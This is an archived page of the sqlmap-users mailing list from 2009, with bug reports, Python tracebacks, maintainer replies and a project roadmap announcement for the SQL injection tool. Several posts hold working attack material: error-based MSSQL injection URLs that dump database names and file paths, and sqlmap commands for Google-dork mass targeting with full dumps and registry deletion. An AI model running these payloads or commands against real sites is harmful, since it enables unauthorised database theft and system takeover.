sqlmap-users Mailing List for sqlmap (Page 134)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:35:55
|
sqlmap supports string injections, but not with the following error based payload. It will come in the long run. Cheers, B On Sun, Dec 6, 2009 at 15:55, One Time <one...@ym...> wrote: > Hi, > Does sqlmap supports string injections? > I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL > 2000) wich is vulnerable to SQL injection. > > Example: > www.xyz.com/default.asp?pag=anypage.asp > "pag" is the injectable parameter > > I'm able to succesfully enumerate users and databases using sqlmap only via > blind sql Injection because for some reason other supported sql injection > methods fail with the error: "[WARNING] for some reasons it was not possible > to retrieve the query output through inband SQL injection technique, sqlmap > is going blind" > > Using other scanners I noticed that it is possible to dump data (for example > databases listing) using queries like these: > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as > nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top > 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t > order by [dbid] desc)-- > ecc.. > This method is really fast (behind proxy too) compared to the extreme > slowness of a blind SQL Injection. > > Why sqlmap doens't detect this type of injection? > > Thank you > Regards > > > ------------------------------------------------------------------------------ > Join us December 9, 2009 for the Red Hat Virtual Experience, > a free event focused on virtualization and cloud computing. > Attend in-depth sessions from your desk. Your couch. Anywhere. > http://p.sf.net/sfu/redhat-sfdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:22:24
|
Fixed and commited. Thanks for reporting. Cheers, Bernardo On Wed, Dec 9, 2009 at 03:22, pacman730 <pac...@us...> wrote: > Hi sqlmap team, > > I found a bug in the getPage function in Connect class. The bug occurs > when there is a timeout exception or others types. > In this case the function is gonna call on itself (if retriesCout < > conf.retires), but with changed url variable. > So in this case its gonna connect to: > http://www.test.com/list.php?id=354%20sqlinjectionhere?id=354%20sqlinjectionhere > > You can't see this with -v 3 because requestMsg its how it should be, I > found it with Wireshark. > To fix this you need to change lines 90, 92, 111 and 130. > This is how I did it: > [...] > line 88 if direct: > if "?" in url: > url2, params = url.split("?") > params = urlencode(params).replace("%%", "%") > url2 = "%s?%s" % (url2, params) > requestMsg += "?%s" % params > [...] > line 105 else: > if conf.parameters.has_key("GET") and not get: > get = conf.parameters["GET"] > > if get: > get = urlencode(get).replace("%%", "%") > url2 = "%s?%s" % (url, get) > requestMsg += "?%s" % get > [...] > line 127 try: > # Perform HTTP request > headers = forgeHeaders(cookie, ua) > req = urllib2.Request(url2, post, headers) > conn = urllib2.urlopen(req) > > I just made a new var url2 to not change url and send it back modified. > > Or maybe you can change line 216 to: > return Connect.__getPageProxy(kwargs) > but I haven't tried it because i was to busy and I'm kinda new to python. > > Have a nice day, > > pacman730 > > ------------------------------------------------------------------------------ > Return on Information: > Google Enterprise Search pays you back > Get the facts. > http://p.sf.net/sfu/google-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:07:12
|
Try with sqlmap latest development version from subversion and
preferably with Python 2.6.
On Mon, Dec 21, 2009 at 09:24, Kerem Gunes <ker...@gm...> wrote:
> sqlmap version: 0.7
> Python version: 2.5.1
> Operating system: darwin
> Traceback (most recent call last):
> File "./sqlmap.py", line 84, in main
> start()
> File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/controller.py", line 263,
> in start
> action()
> File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/action.py", line 140, in
> action
> conf.dbmsHandler.osShell()
> File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 295, in
> osShell
> backdoorUrl = self.__webBackdoorInit()
> File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 187, in
> __webBackdoorInit
> uplPage, _ = Request.getPage(url=uploaderUrl, direct=True)
> File "/Users/h4x/pwn/sqlmap-0.7/lib/request/connect.py", line 131, in
> getPage
> conn = urllib2.urlopen(req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 121, in urlopen
> return _opener.open(url, data)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 374, in open
> response = self._open(req, data)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 392, in _open
> '_open', req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 353, in _call_chain
> result = func(*args)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 1100, in http_open
> return self.do_open(httplib.HTTPConnection, req)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
> line 1057, in do_open
> h = http_class(host) # will parse host:port
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py",
> line 635, in __init__
> self._set_hostport(host, port)
> File
> "/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py",
> line 647, in _set_hostport
> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: ''
>
>
>
> ------------------------------------------------------------------------------
> This SF.Net email is sponsored by the Verizon Developer Community
> Take advantage of Verizon's best-in-class app development support
> A streamlined, 14 day to market process makes app distribution fast and easy
> Join now and get one step closer to millions of Verizon customers
> http://p.sf.net/sfu/verizon-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-21 11:06:05
|
Fixed and committed. Thanks for reporting. Cheers, Bernardo On Sat, Dec 19, 2009 at 13:42, Roberto Castrogiovanni <cas...@gm...> wrote: > Hi, > here is a bug in sqlmap > > ./sqlmap.py --proxy "http://localhost:8118" -u "http://www.xxx.xx?ID=966" > --user-agent="-" --reg-del > > sqlmap version: 0.8-rc2 > Python version: 2.5.4 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 84, in main > start() > File "/home/user/sicurezza/sqlmap/lib/controller/controller.py", line 263, > in start > action() > File "/home/user/sicurezza/sqlmap/lib/controller/action.py", line 163, in > action > conf.dbmsHandler.regDel() > File "/home/user/sicurezza/sqlmap/plugins/generic/takeover.py", line 557, > in regDel > regVal = readInput(msg, default=default) > NameError: global name 'default' is not defined > > [*] shutting down at: 14:38:35 > > > THank you in advance > > Roberto > -- > Computers are like air-conditioners: > they stop working properly > when you open Windows > > > > ------------------------------------------------------------------------------ > This SF.Net email is sponsored by the Verizon Developer Community > Take advantage of Verizon's best-in-class app development support > A streamlined, 14 day to market process makes app distribution fast and easy > Join now and get one step closer to millions of Verizon customers > http://p.sf.net/sfu/verizon-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Kerem G. <ker...@gm...> - 2009-12-21 09:24:15
|
sqlmap version: 0.7
Python version: 2.5.1
Operating system: darwin
Traceback (most recent call last):
File "./sqlmap.py", line 84, in main
start()
File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/controller.py", line 263,
in start
action()
File "/Users/h4x/pwn/sqlmap-0.7/lib/controller/action.py", line 140, in
action
conf.dbmsHandler.osShell()
File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 295, in
osShell
backdoorUrl = self.__webBackdoorInit()
File "/Users/h4x/pwn/sqlmap-0.7/plugins/generic/takeover.py", line 187, in
__webBackdoorInit
uplPage, _ = Request.getPage(url=uploaderUrl, direct=True)
File "/Users/h4x/pwn/sqlmap-0.7/lib/request/connect.py", line 131, in
getPage
conn = urllib2.urlopen(req)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 121, in urlopen
return _opener.open(url, data)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 374, in open
response = self._open(req, data)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 392, in _open
'_open', req)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 353, in _call_chain
result = func(*args)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 1100, in http_open
return self.do_open(httplib.HTTPConnection, req)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/urllib2.py",
line 1057, in do_open
h = http_class(host) # will parse host:port
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py",
line 635, in __init__
self._set_hostport(host, port)
File
"/System/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/httplib.py",
line 647, in _set_hostport
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: ''
|
|
From: Roberto C. <cas...@gm...> - 2009-12-19 13:49:09
|
Hi,
here is a bug in sqlmap
./sqlmap.py --proxy "http://localhost:8118" -u "http://www.xxx.xx?ID=966"
--user-agent="-" --reg-del
sqlmap version: 0.8-rc2
Python version: 2.5.4
Operating system: linux2
Traceback (most recent call last):
File "./sqlmap.py", line 84, in main
start()
File "/home/user/sicurezza/sqlmap/lib/controller/controller.py", line 263,
in start
action()
File "/home/user/sicurezza/sqlmap/lib/controller/action.py", line 163, in
action
conf.dbmsHandler.regDel()
File "/home/user/sicurezza/sqlmap/plugins/generic/takeover.py", line 557,
in regDel
regVal = readInput(msg, default=default)
NameError: global name 'default' is not defined
[*] shutting down at: 14:38:35
THank you in advance
Roberto
--
Computers are like air-conditioners:
they stop working properly
when you open Windows
|
|
From: Sarah K. <sk...@gm...> - 2009-12-16 05:06:29
|
sk...@gm... |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-15 13:59:38
|
Hi, A few months ago sqlmap has passed its 3rd year of virtual life. I would like to personally thank Daniele Bellucci for starting the project back in July 2006 and letting me to succeed him in sqlmap development since September 2006. During the last 12 months, sqlmap has seen a lot of improvements in (post-)exploitation functionalities[1][2][3] ranging from underlying file system read and write access to database buffer overflow exploitation with memory protection bypass passing by UDF injection to execute Metasploit payload in-memory or via payload stager executable and more[4] (thanks to Guido Landi for helping me out with some of these features). I've received tons of great feedback (dumb questions too) privately by email, face to face and via this mailing list from you all and I really appreciate it, thank you[5]! Sorry if I did not get back right away, I might have missed your email: send it again privately and I will try to get back promptly. The media/blogger attention to the tool and SQL injection as a vector not only to expose sensible data but also to own the whole underlying system and internal network in general has been higher in the last 12 months. Personally speaking, since my talk at Black Hat Europe[6][7][8] and the recent Corporate websites ownage[9]. Surprisingly sqlmap is the most downloaded SQL injection tool on SourceForge[10], however I've no statistics about the downloads from third-party mirrors so this information does *not* count globally. Also, a search on Google for "sql injection"[11] places sqlmap at the 21st place, first tool of its category to be mentioned: good to see that many whitepapers and tutorials showed up first, symptom maybe that many people do care about learning how it works before just firing up a tool. Now I see sqlmap development for 2010 going in two directions: 1. I would like to brainstorm with *you* then rewrite from scratch the detection engine, it's the weak part of sqlmap in my opinion, it upsets many users, requires reading and understanding of the user's manual for not-straightforward SQL injections and, sadly, is not as mature as some other tools (very few though[12] ;)). I've some thoughts about it and will share them soon. Please, do reply to this point if you've anything to say either publicly or privately, feel free to get in touch also via Jabber if you prefer. All comments, suggestions and critics will be answered, taken into account and eventually summarized afterwards in an email open to the mailing list. 2. It would be great that someone joins actively the development team (me, sigh..) to maintain the code, refactor it a bit, document it to ease new developers to code over it, fix bugs and add new features. I've a list of about 60 unique items in the ticketing system, so there's plenty of work to do, time permitting. Yes, you've got it right, I am looking for help as in code: software engineers experienced in Python development (no, I won't follow the Ruby hype so please don't ask for a change of technology) so if you ever thought it would be cool to join sqlmap development now it's your time to do so. I can provide you with write access to a personal branch on the sqlmap subversion repository, access to the project management interface (this include ticketing system) and if you show up in London area we can meet for a beer too or, if you prefer, a more typical English tea! ;) I hope this will bring a lot of good ideas and I am open to read all your thoughts. Thanks if you spent your time to the end of this email. [1] http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf [2] http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides [3] http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database [4] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/ChangeLog [5] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/doc/THANKS [6] http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=216402297 [7] http://www.theregister.co.uk/2009/04/02/new_sql_injection_attack/ [8] http://www.h-online.com/security/SQL-injection-reloaded-access-to-the-operating-system--/news/113095 [9] http://www.theregister.co.uk/2009/11/23/symantec_website_security_snafu/ [10] http://sourceforge.net/search/?words=%22sql+injection%22&sort=num_downloads&sortdir=desc&offset=0&type_of_search=soft&pmode=0&form_cat=18 [11] http://www.google.com/search?hl=en&q=sql+injection&start=20&sa=N [12] http://code.google.com/p/sqlibench/ Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: pacman730 <pac...@us...> - 2009-12-09 03:50:18
|
Hi sqlmap team, I found a bug in the getPage function in Connect class. The bug occurs when there is a timeout exception or others types. In this case the function is gonna call on itself (if retriesCout < conf.retires), but with changed url variable. So in this case its gonna connect to: http://www.test.com/list.php?id=354%20sqlinjectionhere?id=354%20sqlinjectionhere You can't see this with -v 3 because requestMsg its how it should be, I found it with Wireshark. To fix this you need to change lines 90, 92, 111 and 130. This is how I did it: [...] line 88 if direct: if "?" in url: url2, params = url.split("?") params = urlencode(params).replace("%%", "%") url2 = "%s?%s" % (url2, params) requestMsg += "?%s" % params [...] line 105 else: if conf.parameters.has_key("GET") and not get: get = conf.parameters["GET"] if get: get = urlencode(get).replace("%%", "%") url2 = "%s?%s" % (url, get) requestMsg += "?%s" % get [...] line 127 try: # Perform HTTP request headers = forgeHeaders(cookie, ua) req = urllib2.Request(url2, post, headers) conn = urllib2.urlopen(req) I just made a new var url2 to not change url and send it back modified. Or maybe you can change line 216 to: return Connect.__getPageProxy(kwargs) but I haven't tried it because i was to busy and I'm kinda new to python. Have a nice day, pacman730 |
|
From: One T. <one...@ym...> - 2009-12-06 15:56:09
|
Hi, Does sqlmap supports string injections? I'm asking this because I'm testing sqlmap on my company site (ASP + MSSQL 2000) wich is vulnerable to SQL injection. Example: www.xyz.com/default.asp?pag=anypage.asp "pag" is the injectable parameter I'm able to succesfully enumerate users and databases using sqlmap only via blind sql Injection because for some reason other supported sql injection methods fail with the error: "[WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind" Using other scanners I noticed that it is possible to dump data (for example databases listing) using queries like these: www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 27 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)-- www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 28 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)-- www.xyz.com/default.asp?pag=anypage.asp' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 29 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)-- ecc.. This method is really fast (behind proxy too) compared to the extreme slowness of a blind SQL Injection. Why sqlmap doens't detect this type of injection? Thank you Regards |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-04 09:35:51
|
Hi, Due to very low traffic on the sqlmap-devel mailing list, I've decided to merge it into sqlmap-users. All users that were registered to the old development mailing list are now into this one. Don't worry, it's a low traffic mailing list too as you can see from the archive. Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-04 00:33:57
|
Hi Tim,
What is the url you provided sqlmap with?
Did you manually confirm that the page content differs when true and
false conditions are injected for zahl2 parameter?
Cheers,
Bernardo
On Tue, Nov 17, 2009 at 11:03, Tim Jordans <ma...@ti...> wrote:
> Hello,
> my name is Tim Jordans.
>
> First of all i have tested sqlmap and thanks for the tool.
>
> I stumbled upon a problem. In the following php-script sqlmap did not
> find any injection:
>
> mysql_query('SELECT * FROM tb_apotheke WHERE AID="'.
> mysql_real_escape_string($_REQUEST['zahl1']).'" OR AID='.
> $_REQUEST['zahl2'].' OR AID="'.
> mysql_real_escape_string($_REQUEST['zahl3']).'"'
> );
>
> Although the middle parameter is not escaped sqlmap can´t inject. I was
> wondering if the statement is not unsecure or is this not part of the
> sqlmap testing routine.
>
> I hope that someone could help me with this problem.
>
> greetings
> tim jordans
>
> ------------------------------------------------------------------------------
> Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
> trial. Simplify your report design, integration and deployment - and focus on
> what you do best, core application coding. Discover what's new with
> Crystal Reports now. http://p.sf.net/sfu/bobj-july
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-03 23:15:09
|
Hi Superman, I can't reproduce this bug on my test environment. Can you please edit ./lib/techniques/blind/inference.py adding before line 126 the following: print "expressionUnescaped: " + expressionUnescaped + " idx: " + idx + " posValue: " + posValue and get back with the whole sqlmap output from the beginning? Cheers, Bernardo > forgedPayload = payload % (expressionUnescaped, idx, posValue) On Tue, Nov 17, 2009 at 19:18, Clark Kent <wo...@gm...> wrote: > > Command > sqlmap.py -u "http://vulnerable.com/test.aspx?page=95937&id=95937" -p "id" > -v3 --dbs --string "hidden" > > Cookie: > ASP.NET_SessionId=3jnjn345cxjtmequ2g0qqg45;B100Serverpoolcookie=3841711232.1.3728877696.2466886620 > Accept: > text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 > User-agent: sqlmap/0.8-rc1 (http://sqlmap.sourceforge.net) > Connection: close > > [11:13:14] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 or 2008 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322 > back-end DBMS: Microsoft SQL Server 2005 > > [11:13:14] [INFO] fetching database names > [11:13:14] [INFO] fetching number of databases > [11:13:14] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS > VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases > [11:13:14] [ERROR] unhandled exception in sqlmap/0.8-rc1, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.8-rc1 > Python version: 2.6.4 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 84, in main > start() > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/controller.py", > line 263, in start > action() > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/action.py", > line 108, in action > dumper.lister("available databases", conf.dbmsHandler.getDbs()) > File > "/home/blackcatz/Desktop/sqlmap/sqlmap/plugins/generic/enumeration.py", line > 661, in getDbs > count = inject.getValue(query, inband=False, expected="int", > charsetType=2) > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line > 378, in getValue > value = __goInferenceProxy(expression, fromUser, expected, batch, > resumeValue, unpack, charsetType, firstChar, lastChar) > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line > 308, in __goInferenceProxy > outputs = __goInferenceFields(expression, expressionFields, > expressionFieldsList, payload, expected, resumeValue=resumeValue, > charsetType=charsetType, firstChar=firstChar, lastChar=lastChar) > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line > 99, in __goInferenceFields > output = __goInference(payload, expressionReplaced, charsetType, > firstChar, lastChar) > File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line > 58, in __goInference > count, value = bisection(payload, expression, length, charsetType, > firstChar, lastChar) > File > "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", > line 253, in bisection > val = getChar(index, asciiTbl) > File > "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", > line 126, in getChar > forgedPayload = payload % (expressionUnescaped, idx, posValue) > TypeError: not enough arguments for format string -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-01 10:30:03
|
Google changed the source code of the results page, I will adapt sqlmap soon to parse the new HTTP response. Regards, Bernardo On Mon, Nov 30, 2009 at 06:46, FS Inc. <fs...@ho...> wrote: > Hi when I issue this command, this is what happens always. > > ---- > sqlmap --dump-all -g "site:mytestsite.org ext:asp" > > sqlmap/0.7 > by Bernardo Damele A. G. <ber...@gm...> > > [*] starting at: 02:41:20 > > [02:41:20] [INFO] first request to Google to get the session cookie > [02:41:39] [ERROR] unable to find results for your Google dork expression > > [*] shutting down at: 02:41:39 > ---- > > I replaced my own website name with mytestsite.org to protect the innocent. > > If i go to google and type directly into the search box site:mytestsite.org > ext:asp I get a list of the asp pages of my website. > > Is there something I am missing? > > Thanks. > > > ________________________________ > Windows Live: Friends get your Flickr, Yelp, and Digg updates when they > e-mail you. > ------------------------------------------------------------------------------ > Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day > trial. Simplify your report design, integration and deployment - and focus > on > what you do best, core application coding. Discover what's new with > Crystal Reports now. http://p.sf.net/sfu/bobj-july > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: FS I. <fs...@ho...> - 2009-11-30 06:46:32
|
Hi when I issue this command, this is what happens always. ---- sqlmap --dump-all -g "site:mytestsite.org ext:asp" sqlmap/0.7 by Bernardo Damele A. G. <ber...@gm...> [*] starting at: 02:41:20 [02:41:20] [INFO] first request to Google to get the session cookie [02:41:39] [ERROR] unable to find results for your Google dork expression [*] shutting down at: 02:41:39 ---- I replaced my own website name with mytestsite.org to protect the innocent. If i go to google and type directly into the search box site:mytestsite.org ext:asp I get a list of the asp pages of my website. Is there something I am missing? Thanks. _________________________________________________________________ Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010 |
|
From: Clark K. <wo...@gm...> - 2009-11-17 19:19:06
|
Command sqlmap.py -u "http://vulnerable.com/test.aspx?page=95937&id=95937" -p "id" -v3 --dbs --string "hidden" Cookie: ASP.NET_SessionId=3jnjn345cxjtmequ2g0qqg45;B100Serverpoolcookie=3841711232.1.3728877696.2466886620 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-agent: sqlmap/0.8-rc1 (http://sqlmap.sourceforge.net) Connection: close [11:13:14] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322 back-end DBMS: Microsoft SQL Server 2005 [11:13:14] [INFO] fetching database names [11:13:14] [INFO] fetching number of databases [11:13:14] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases [11:13:14] [ERROR] unhandled exception in sqlmap/0.8-rc1, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible: sqlmap version: 0.8-rc1 Python version: 2.6.4 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 84, in main start() File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/controller.py", line 263, in start action() File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/controller/action.py", line 108, in action dumper.lister("available databases", conf.dbmsHandler.getDbs()) File "/home/blackcatz/Desktop/sqlmap/sqlmap/plugins/generic/enumeration.py", line 661, in getDbs count = inject.getValue(query, inband=False, expected="int", charsetType=2) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 378, in getValue value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 308, in __goInferenceProxy outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 99, in __goInferenceFields output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/request/inject.py", line 58, in __goInference count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 253, in bisection val = getChar(index, asciiTbl) File "/home/blackcatz/Desktop/sqlmap/sqlmap/lib/techniques/blind/inference.py", line 126, in getChar forgedPayload = payload % (expressionUnescaped, idx, posValue) 